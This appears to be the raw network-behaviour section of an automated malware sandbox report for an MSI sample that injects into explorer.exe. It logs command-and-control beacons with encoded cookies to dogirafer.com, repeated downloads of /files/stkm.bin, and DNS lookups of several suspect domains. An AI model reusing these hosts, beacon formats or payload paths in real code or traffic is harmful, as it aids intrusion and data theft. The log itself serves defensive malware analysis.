            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hldViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.com
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.com
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hidViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hjdViRxTPtzXdZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 360Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hgdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hhdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hudViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hvdViRxTPtzGAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 12228Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnawqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkawqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkagqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlYAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlZAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlawqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hlagqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\explorer.exeCode function: 9_2_0311900C InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,9_2_0311900C
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.com
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.com
            Source: global trafficDNS traffic detected: DNS query: huanvn.com
            Source: global trafficDNS traffic detected: DNS query: vutarf.com
            Source: global trafficDNS traffic detected: DNS query: reateberam.com
            Source: global trafficDNS traffic detected: DNS query: dogirafer.com
            Source: unknownHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 92Cache-Control: no-cache
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: explorer.exe, 00000009.00000002.4147116004.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: explorer.exe, 00000009.00000002.4147116004.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: explorer.exe, 00000009.00000002.4147116004.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: explorer.exe, 00000009.00000002.4156562592.000000000CA63000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4147116004.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
            Source: explorer.exe, 00000009.00000002.4156562592.000000000CA63000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab=
            Source: explorer.exe, 00000009.00000002.4147116004.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
